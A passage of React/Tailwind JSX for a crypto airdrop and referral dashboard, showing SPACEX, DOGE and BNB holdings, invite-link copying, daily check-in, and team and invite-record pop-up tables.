                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }

                    
                    
                </div>
      {/*  */}
    </div>
  </div>
</div>
                    </CSSTransition>
{/* SPACEX AIR */}
                     <CSSTransition
                    in={isShowMenu3}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
  <div
  className="
    fixed inset-0 z-50
    flex items-center justify-center
    bg-black/30
    backdrop-blur-[14px]
    backdrop-saturate-150
    px-4
  "
>
  <div
    className="
      relative
      w-full max-w-[390px]
      min-h-[520px]
      px-5 py-6
      overflow-hidden

      bg-black/80

      border-0 border-[#4A5560]

      shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

      [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
    "
  >
    {/* Close */}
    <button
      onClick={()=>setIsShowMenu3(false)}
      className="
        absolute right-4 top-4 z-50
        w-6 h-6
        flex items-center justify-center

        text-text1
        text-[14px]
        leading-none

        border border-[#3A444E]
        bg-[#070D12]/95

        [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

        transition-all duration-200

        hover:text-text1
        hover:border-[#6B7680]
        hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
      "
    >
      ×
    </button>

    {/* 外层细线 */}
    <div
      className="
        absolute inset-[6px]
        pointer-events-none
        border border-[#171c20]

        [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
      "
    />

    

    

    {/* 左上角 */}
    <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
    

    {/* 右上角 */}
    <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
    

    {/* 左下角 */}
    <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
    

    {/* 右下角 */}
    <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
  

  

    {/* 内部暗色纹理线 */}
    <div
      className="
        absolute inset-0
        opacity-25
        pointer-events-none
        bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
      "
    />

    {/* 内容区域 */}
    <div className="relative z-10">
      {/* 这里放你的弹窗内容 */}
            <div className=' w-full  px-0 py-4 mt-3 flex flex-col'>
                  
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12'>{t('air.状态')}</span>
                       
                        <span className='w-4/12 text-center'>SPACEX</span>
                        <span className='w-3/12'>{t('air.单据')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    {
                            childs2.length>0?
                            childs2.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                            
                                            <span className='w-4/12 text-center'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.value}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                            </span>
                                            <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                            </div>
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }

                    
                    
                </div>
      {/*  */}
    </div>
  </div>
</div>
                    </CSSTransition>

{/* TEAM */}
                    <CSSTransition
                    in={isShowMenu2}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
  <div
  className="
    fixed inset-0 z-50
    flex items-center justify-center
    bg-black/30
    backdrop-blur-[14px]
    backdrop-saturate-150
    px-4
  "
>
  <div
    className="
      relative
      w-full max-w-[390px]
      min-h-[520px]
      px-5 py-6
      overflow-hidden
       

      bg-black/80

      border-0 border-[#4A5560]

      shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

      [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
    "
  >
    {/* Close */}
    <button
      onClick={()=>setIsShowMenu2(false)}
      className="
        absolute right-4 top-4 z-50
        w-6 h-6
        flex items-center justify-center

        text-text1
        text-[14px]
        leading-none

        border border-[#3A444E]
        bg-[#070D12]/95

        [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

        transition-all duration-200

        hover:text-text1
        hover:border-[#6B7680]
        hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
      "
    >
      ×
    </button>

    {/* 外层细线 */}
    <div
      className="
        absolute inset-[6px]
        pointer-events-none
        border border-[#171c20]

        [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
      "
    />

    

    

    {/* 左上角 */}
    <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
    

    {/* 右上角 */}
    <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
    

    {/* 左下角 */}
    <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
    

    {/* 右下角 */}
    <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
  

  

    {/* 内部暗色纹理线 */}
    <div
      className="
        absolute inset-0
        opacity-25
        pointer-events-none
        bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
      "
    />

    {/* 内容区域 */}
    <div className="relative z-10 overflow-scroll h-[520px]">
      {/* 这里放你的弹窗内容 */}
            <div className=' w-full  px-0 py-4 mt-3 flex flex-col'>
                  
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12 text-center'>{t('air.铸造')}</span>
                       <span className='w-4/12 text-center'>{t('air.团队人数')} | {t('air.业绩')}</span>
                        
                        <span className='w-3/12 text-center'>{t('air.地址')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    {
                            zhi.length>0?
                            zhi.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            
                                            
                                            <span className='w-2/12 text-center text-orange-500'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.eth}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} /> BNB
                                            </span>
                                            <span className='w-4/12 text-center'>
                                                {item.tuan_num} | <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.big_bnb}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} /> BNB
                                            </span>
                                            <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.address}</span>
                                                
                                            </div>
                                        </div>
                                        <div className=' w-full h-px  bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }

                    
                    
                </div>
      {/*  */}
    </div>
  </div>
</div>
                    </CSSTransition>
            <Head/>
            <div className=' invitebg  w-full lg:w-1/3 md:w-1/3 sm:1/2  px-0 pt-12 text-white flex flex-col z-10'>
                {/*  */}
                <div className='w-full lg:w-1/3 px-0   min-h-[144px]  flex flex-row  '>
                    <div className=' w-full lg:w-1/3 md:w-1/3 sm:1/2 min-h-[144px]  absolute  '>
                        {/* 狗狗特效代码 */}
                                    {/* 狗狗特效代码 */}
                        <div className=" absolute right-[10px] top-4 z-0 w-[200px]  pointer-events-none">
                        <img
                            src={require("../../assets/air/logo1.png")}
                            alt="doge"
                            className="doge-img absolute right-0 top-0 w-[150px]"
                        />
{/* 
                        <span className="doge-orbit doge-orbit-1" />
                        <span className="doge-orbit doge-orbit-2" /> */}

                        <span className="doge-star s1" />
                        <span className="doge-star s2" />
                        <span className="doge-star s3" />
                        <span className="doge-star s4" />

                        {/* <span className="doge-light" /> */}
                        </div>
                        {/* 狗狗特效代码结束 */}
                            
                        {/*  */}
                    </div>
                    <div className='w-1/2 pl-4 flex flex-col z-40'>
                        <img className='mt-5  '  src={require('../../assets/air/title.png')} style={{"width":"158px"}}></img>
                        <span className='mt-[9px] text-text2 text-[10px]' >Hold·Invite·Earn</span>
                        <span className='mt-[5px] text-gray-200 text-[9px]' >Hold SPACEX invite friends and earn more rewards</span>
                       
                        

                    </div>
                    
                </div>
                {/*  */}
                <div className='mx-4 mt-3 pl-[70px]  pt-2  airValeBg h-[74px]  flex flex-col z-10 '>
                    <span className='text-text2 text-[10px]'>{t('air.当前持有价值')}</span>
                    <div className='w-full mt-0 flex flex-row justify-start items-end'>
                        <span className="mt-1 text-xl font-black leading-none tracking-wide
                            bg-gradient-to-b from-[#fff6b8] via-[#ffb11a] to-[#ff6a00]
                            bg-clip-text text-transparent
                            drop-shadow-[0_0_6px_rgba(255,170,0,0.9)]
                            ">≈$<CountUp start={0} end={allValue*dogePrice+spacexAir*spacexPrice+bnb*bnbPrice} duration="1" decimals={4} /></span>
                        <span className='ml-1 mb-0 text-[10px] text-gray-300'>USD</span>
                    </div>
                 
                    <div className='mt-1  flex flex-row justify-between items-center'>
                        <span className='text-gray-400 text-[9px]'>
                            <CountUp start={0} end={spacexAir} duration="1" decimals={1} /> SPACEX
                            +<CountUp start={0} end={allValue} duration="1" decimals={1} /> DOGE
                            +<CountUp start={0} end={bnb} duration="1" decimals={3} /> BNB
                            
                        </span>
    
                    </div>
                </div>
                {/*  */}
                <div className=' mx-4 mt-3 SWAPbg1  h-[140px] px-4 pt-4 flex flex-col '>
                    <span className=' text-[10px] text-text2'>{t('air.邀请好友')}</span>
                    <span className=' text-[8px] text-gray-400'>{t('air.邀请更多的好友赚钱DOGE')}</span>
                    <div className="w-full min-h-[28px] mt-2
                                relative inline-flex flex-col h-4  justify-start 
                                px-3 py-2 text-white text-[10px]  tracking-wider
                                [--cut:4px] [--border:1px]
                                before:absolute before:inset-0 before:bg-gray-800/50
                                before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                after:absolute after:inset-[var(--border)] after:bg-[#010B1250]
                                after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                            ">
                                {
                                    shareLink.length>0?(
                                        <div onClick={_copy} className='w-full z-10 flex flex-row justify-center items-center'>
                                            <span className='text-[12px] leading-[12px] text-text1'>{shareLink}</span>
                                            {/* <span className=' ml-1 text-[9px] leading-[10px] text-white'>[复制]</span> */}
                                        </div>
                                    ):(
                                        <div onClick={_copy} className='w-full z-10 flex flex-row justify-center items-center'>
                                            <span className='text-[12px] leading-[12px] text-text1'>No data</span>
                                            {/* <span className=' ml-1 text-[9px] leading-[10px] text-white'>[复制]</span> */}
                                        </div>
                                    )
                                }
                            
                        
                        </div>
                          <div className='w-full h-6 mt-4  ml-2 flex flex-row justify-center items-center'>
                        <button onClick={_copy} className="w-[140px] sci-glow-btn"> <span>{t('g.复制邀请链接')}</span></button>
                    </div>

                   
                </div>
                {/*  */}
                {/*  */}
                <div className='mx-4 mt-4  py-3  airCheckBg h-[103px]  flex flex-col items-center relative'>
                    <span className="mt-1 text-base font-black leading-none tracking-wide
                            bg-gradient-to-b from-[#F7F5F9] via-[#EFE2F7] to-[#DCB0FC]
                            bg-clip-text text-transparent
                            drop-shadow-[0_0_6px_rgba(255,170,0,0.9)]
                            ">{t('air.每日签到打卡')}</span>
                    {/* <span className='mt-1 text-[9px] text-gray-400'>{t('air.每日签到解锁1DOGE')}</span> */}
                    <span className='mt-1 text-[9px] text-gray-400'>{t('air.累计签到次数')}：{qianNum}</span>
                    <button onClick={_qian} className="checkin-btn mt-2">
                    {t('air.立刻签到')}
                    </button>
                    <div className=' absolute w-[87px] h-8  bottom-1 right-4 flex flex-col items-center' >
                        <span className='text-gray-300 text-[9px]'>{t('air.最近签到')}</span>
                        {/* <span className='text-[#966EB2] text-[9px]'><Moment format="MM-DD HH:mm:ss" unit="days" unix>{checkTime.length>0?checkTime:""}</Moment></span> */}
                        {
                            checkTime?(
                                <span className='text-[#966EB2] text-[9px]'><Moment format="MM-DD HH:mm:ss" unit="days" unix>{checkTime}</Moment></span>
                            ):(
                                <span className='text-[#966EB2] text-[9px]'>--</span>
                            )   
                        }
                        
                    </div>
                    
                 
                    
                </div>
                
                {/*  */}

                <div className=' nftHold mx-4 mt-3 pb-2'>
                    
                    <div className='  mt-3 px-3 pt-1 flex flex-row justify-between items-center'>
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/ipo/dogelogo.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.已解锁')}</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={locked}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[9px] text-gray-400'>DOGE</span>
                            <span className=' text-[10px] text-gray-400'>≈$

                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={locked*dogePrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/2.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.推广收益')} </span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bonus}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[9px] text-gray-400'>DOGE</span>
                            <span className=' text-[10px] text-gray-400'>≈$
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bonus*dogePrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/3.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.总锁仓')}</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={allLock}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[9px] text-gray-400'>DOGE</span>
                            <span className=' text-[10px] text-gray-400'>≈$
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={allLock*dogePrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>

                    </div>
                    {/*  */}
                    <div className='  px-3 pt-1 flex flex-row justify-between items-center'>
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/ipo/logo1.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('foot.空投')}{t('air.当前持有')}</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={spacexAir}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[8px] text-gray-400 mt-2'>SPACEX</span>
                            <span className=' text-[10px] text-gray-400'>≈$

                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={spacexAir*spacexPrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/22.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.推广收益')}1 </span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={regAir1}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[8px] text-gray-400 mt-2'>SPACEX</span>
                            <span className=' text-[10px] text-gray-400'>≈$
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={regAir1*spacexPrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/33.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.推广收益')}2</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={regAir2}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={1} />
                            </span>
                            <span className=' text-[8px] text-gray-400 mt-2'>SPACEX</span>
                            <span className=' text-[10px] text-gray-400'>≈$
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={regAir2*spacexPrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={2} />
                            </span>
                        </div>

                    </div>
                    {/*  */}
                    <div className='  mt-1 px-3 pt-1 flex flex-row justify-between items-center'>
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/ipo/bnblogo.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.当前持有')}</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bnb}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={3} />
                            </span>
                            <span className=' text-[9px] text-gray-400'>BNB</span>
                            <span className=' text-[10px] text-gray-400'>≈$

                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bnb*bnbPrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={3} />
                            </span>
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/444.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.推广收益')}1 </span>
                            {
                                old?(
                                    <>
                                        <span className=' text-xs'>
                                            <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={mint1}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={3} />
                                        </span>
                                        <span className=' text-[9px] text-gray-400'>BNB</span>
                                        <span className=' text-[10px] text-gray-400'>≈$
                                            <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={mint1*bnbPrice}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={3} />
                                        </span>
                                    </>
                                ):(
                                    <>
                                        <span className=' text-[9px]'>
                                            <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={mint2}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                        </span>
                                        <span className=' text-[9px] text-gray-400'>SPACEX</span>
                                        {/* <span className=' text-[10px] text-gray-400'>≈$
                                            <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={mint1*bnbPrice}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={3} />
                                        </span> */}
                                    </>
                                )
                            }
                            
                        </div>
                        <div className="w-px h-14 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" />
                        <div className=' w-28 h-[90px] relative flex flex-col pt-2 pl-10 '>
                            <img className= ' absolute left-2 top-2 '  src={require('../../assets/air/44.png')} style={{"width":"27px"}}></img>
                            <span className=' text-[8px] text-text2'>{t('air.团队业绩')}</span>
                            <span className=' text-xs'>
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bigBnb}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={3} />
                            </span>
                            <span className=' text-[9px] text-gray-400'>BNB</span>
                            <span className=' text-[10px] text-gray-400'>≈$
                                <NumberFormat
                                    thousandsGroupStyle="thousand"
                                    value={bigBnb*bnbPrice}
                                    prefix=""
                                    decimalSeparator="."
                                    displayType="text"
                                    type="text"
                                    thousandSeparator={true}
                                    fixedDecimalScale={true}
                                    allowNegative={false}
                                    decimalScale={3} />
                            </span>
                        </div>

                    </div>
                    {/*  */}
                </div>
               
                
                {/*  */}
                <div className='airDataBg2 mx-4 mt-3 flex flex-row justify-between items-center'>
                    <div className=' w-1/3 h-[55px] ml-0  flex flex-row  pl-4 justify-start items-center '>
                        <img className= '  '  src={require('../../assets/air/4.png')} style={{"width":"28px"}}></img>
                        <div className=' ml-2 h-9 flex flex-col justify-between'>
                            <span className=' text-[8px] text-text2'>{t('air.推荐人数')}</span>
                            <div>
                                <span className=' text-xs'>{zhiNum}</span>
                                <span className=' text-[8px] text-gray-400'></span>
                            </div>
                        </div>
                
                    </div>
                    
                    <div className="w-px h-10 mr-2 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" ></div>
  
                    <div className=' w-1/3 h-[55px]  flex flex-row  pl-4 justify-start items-center '>
                        <img className= '  '  src={require('../../assets/air/5.png')} style={{"width":"28px"}}></img>
                        <div className=' ml-2 h-9 flex flex-col justify-between'>
                            <span className=' text-[8px] text-text2'>{t('air.团队人数')}</span>
                            <div>
                                <span className=' text-xs'>{tuanNum}</span>
                                <span className=' text-[8px] text-gray-400'></span>
                            </div>
                        </div>
                
                    </div>

                    <div className="w-px h-10 mr-2 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" ></div>

                    <div className=' w-1/3 h-[55px]  flex flex-row  pr-4 justify-start items-center '>
                        <img className= '  '  src={require('../../assets/air/55.png')} style={{"width":"28px"}}></img>
                        <div className=' ml-2 h-9 flex flex-col justify-between'>
                            <span className=' text-[8px] text-text2'>{t('air.小区人数')}</span>
                            <div>
                                <span className=' text-xs'>{small}</span>
                                <span className=' text-[8px] text-gray-400'></span>
                            </div>
                        </div>
                
                    </div>
                   
                </div>
                {/*  */}
                {/* <div className='airDataBg2 mx-4 mt-3 flex flex-row justify-between items-center'>
                    <div className=' w-1/2 h-[55px] ml-0  flex flex-row   justify-center items-center '>
                        <img className= '  '  src={require('../../assets/air/4.png')} style={{"width":"28px"}}></img>
                        <div className=' ml-2 h-9 flex flex-col justify-between'>
                            <span className=' text-[8px] text-text2'>{t('air.团队业绩')}</span>
                            <div>
                                <span className=' text-sm'>{zhiNum}</span>
                                <span className=' text-[8px] text-gray-400 ml-1'> BNB</span>
                            </div>
                        </div>
                
                    </div>
                    
                    <div className="w-px h-10 mr-2 bg-gradient-to-b from-transparent via-[#071C27] to-transparent" ></div>
  
                    <div className=' w-1/2 h-[55px]  flex flex-row   justify-center items-center '>
                        <img className= '  '  src={require('../../assets/air/5.png')} style={{"width":"28px"}}></img>
                        <div className=' ml-2 h-9 flex flex-col justify-between'>
                            <span className=' text-[8px] text-text2'>{t('air.小区业绩')}</span>
                            <div>
                                <span className=' text-sm'>{tuanNum}</span>
                                <span className=' text-[8px] text-gray-400 ml-1'> BNB</span>
                            </div>
                        </div>
                
                    </div>

                    
                   
                </div> */}
                {/*  */}
                <div className='recordbg mx-4 h-36 px-4 py-4 mt-3 flex flex-col'>
                    <div className='w-full flex flex-row justify-between items-center'>
                        <span className='text-text2 text-xs'>{t('air.邀请记录')}</span>
                        <span onClick={()=>setIsShowMenu2(true)} className='text-text2 text-[9px]'>{t('air.显示全部')}</span>
                    </div>
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12 text-center'>{t('air.铸造')}</span>
                        <span className='w-4/12 text-center'>{t('air.团队人数')} | {t('air.业绩')}</span>
                       
                        <span className='w-3/12 text-center'>{t('air.地址')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    {
                            zhi.length>0?
                            zhi.slice(0, 3).map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                        
                                            <span className='w-2/12 text-center text-orange-500'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.eth}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} /> BNB
                                            </span>
                                            <span className='w-4/12 text-center'>
                                               {item.tuan_num} | <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.big_bnb}
                                                prefix=""
